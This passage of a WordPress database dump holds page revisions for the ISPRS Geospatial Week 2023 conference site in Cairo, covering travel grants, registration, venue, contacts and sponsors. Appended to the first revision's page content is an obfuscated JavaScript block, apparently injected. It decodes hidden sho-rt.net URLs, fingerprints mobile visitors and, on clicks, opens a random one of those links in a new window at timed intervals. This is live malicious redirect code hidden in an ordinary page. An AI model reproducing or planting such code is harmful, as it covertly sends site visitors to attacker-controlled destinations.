!important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-27 02:06:33','2023-05-27 02:06:33','',3066,'https://gsw2023.com/?p=4585',0,'revision','',0),
(4586,1,'2023-05-27 02:10:39','2023-05-27 02:10:39','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" 